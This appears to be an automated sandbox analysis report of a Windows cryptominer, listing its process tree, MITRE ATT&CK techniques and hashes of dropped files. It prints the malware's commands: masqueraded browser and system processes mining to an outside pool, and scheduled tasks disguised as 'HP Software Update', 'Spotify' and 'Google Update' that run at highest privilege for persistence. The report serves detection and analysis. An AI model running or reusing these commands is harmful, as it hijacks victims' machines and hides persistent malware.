C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2976
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:1776
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2856
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:1728
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2016
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:1036
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵PID:2428
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 9 /TN "HP Software Update" /TR "\"C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:1496
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 17 /TN "Spotify" /TR "\"C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:2640
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "AppExtender" /TR "\"C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:2680
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 12 /TN "Google Update" /TR "\"C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:840
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Comm Driver" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:2124
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:1788
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:2664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:2060
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:864
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:2288
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:2116
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:1936
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:484
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:580
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵PID:2612
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.6MB
MD571c88f5d6c5bc5d2c744fa73e581a797
SHA1814e921f896b756297be31a2c758e66a49f31f6a
SHA2561912ec3a958c3e1d021cc43941cce66ad02009072f396554910de7d302c76d74
SHA5125ec5135afcdd2ac81b6bf0fb995ad6095a88f485e0198a5593cfb2fef77b5a9ea8af5d593b5624dd6f82bda95445c5cc83489f92f5e1623814cc74b1730c5ab6
-
Filesize
2.6MB
MD5dcc8e9a880b5d1b05ca9fe901e3be8ff
SHA1b0c4c60bef2319bec568fabd086fca621f4e2360
SHA2561c9cd6cdb6f15c6a6bd5c0ab9230705597524448e6d3cf40435f80a31eb49081
SHA5121013474d5edaa79bd59087f551ef875c2efe7df24b279c46dbf4cb948dfa791e0603ab759b82e8b069ffe08745311eb464d638dd7716a47b1e255337c906d687
-
Filesize
2.6MB
MD541e51a860acec7af8c3469b46fab93e1
SHA103413b23ed6014d49edbf31b7c6f83c581974c3b
SHA25698807ce48156b3f9f8664b65ec912044ecdb8c58d1c8db1cb8a483a72b42c821
SHA51229545b54bf3839c82483b48f24818b954787f26e703a5b4e586f51cfaf8205a4e94b03d4c7696cb1b183e58bf11b714fb1009f8ccca614dec3883cd8ce81d163
-
Filesize
2.6MB
MD530d571a75925f0032e30a76503996a78
SHA15ff5327844678d74d1971908a6900e2e67bc96d3
SHA25622bd2c7222e0d6cdabd3e00fa00f4ad43418a67d3e7498c156827174ab52fa22
SHA5124a3a97e7d751b620d964849bfdf51fdf85092512060522d95ca5852679e519653fd9fa3e13e78196f061bcbd4508b86db1ef3f4403f9f415b7c78e6ad261e814
-
Filesize
2.6MB
MD5a7290618afd84e3d6afc8a7b13f70c12
SHA1b72b3ede5c8672024a47c207a3962170fc372f52
SHA2561b75bc3bd6258f8cd0ae1803f65797c53423818e392003581932c320c0e2d35f
SHA512260605f3c86fb57064fc277cb5f2c6db83df95838cddfbbd726925e64f869692539775ba3bdc286d3cf8a6ad2f86c92b4862f9f0f3e2042e33d40196d8da6907
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
2.6MB
MD5b5655497b31e458f7955d35117c6f439
SHA1c4ca954c90ea3c91e7b0c1719ca57695a397716c
SHA2565ae847639e17edfadacdb4a0b82319e2f6b11901e0a02c3c5046264e3cb1b750
SHA512859f3ec3f39693de38def8f6d52842cd1aaf7baf50f227a81670e2fe1956a593a9611a84ac424352c8814947ae384847e1ca9e933e6b31d8bf987d6310a027b1
-
Filesize
2.6MB
MD5577427b4d0735dcba82c1bca6da174cf
SHA1c95241f92e50c9ef33dbda0be59687b6208a3963
SHA256be77542fa98288750e2a2cd808e7bd4512f7ff76a85d849fa568c317eeb376cd
SHA512113d6736b93689e30a66e423b1d36ecd97913e566e3a5262a3a6fc5b445dfa938de95e3e53c7ac105f1a01761e461afd9618fce3bd548d73c117d681b919c60d
-
Filesize
2.6MB
MD545704c2b9b5fca3011a1214ae26bb3f4
SHA18d7384bf9150946f30ab155955c88713c5c8ee3b
SHA25622504a61daa2db1d8f42b4a4563d687d611d957408d64e9c27ad88b4cf593b9b
SHA5126904a943be4d0dadc559df893e13dcf28d2a48a05704ecd776c8f2a2d680c49b6ec68c4fa2288f208f9dd0e50788a4895e92d1fd28645a5c0ceeda4c54b839fb
-
Filesize
2.6MB
MD586f56716bb66aec6900ec7d81c8ccce9
SHA142e53ad2cc9283bfba09ad5bdcb9702d13c70c72
SHA2560b0daeb94070b6006bb2fc7b44c748e3151ead04538230f65ad57a0121d75e4a
SHA5121912ceb2012800eadaf84aa30f0863221bc5efe43c00c798564ecba08a4ebd9f491bde6f6cf967dcebea1c8d50d943eabc0190beea6f99406d5d6511162044fd
-
Filesize
126KB
MD52e9a71e4ee33d190056e081e6726fa56
SHA1db355fc276b8174e1753f45dbdf52536f7740316
SHA2569262765163efb9dd31f8e9a3cd3ca1b06367524deb4272343f22e554198449da
SHA5120425620770da2c1b297da33fb92f91444dd547a39e08bd3d670742ee6172f259aad071ee2fe08a8f61725a67703264cec7e1465b6d2bce644d64753b63209472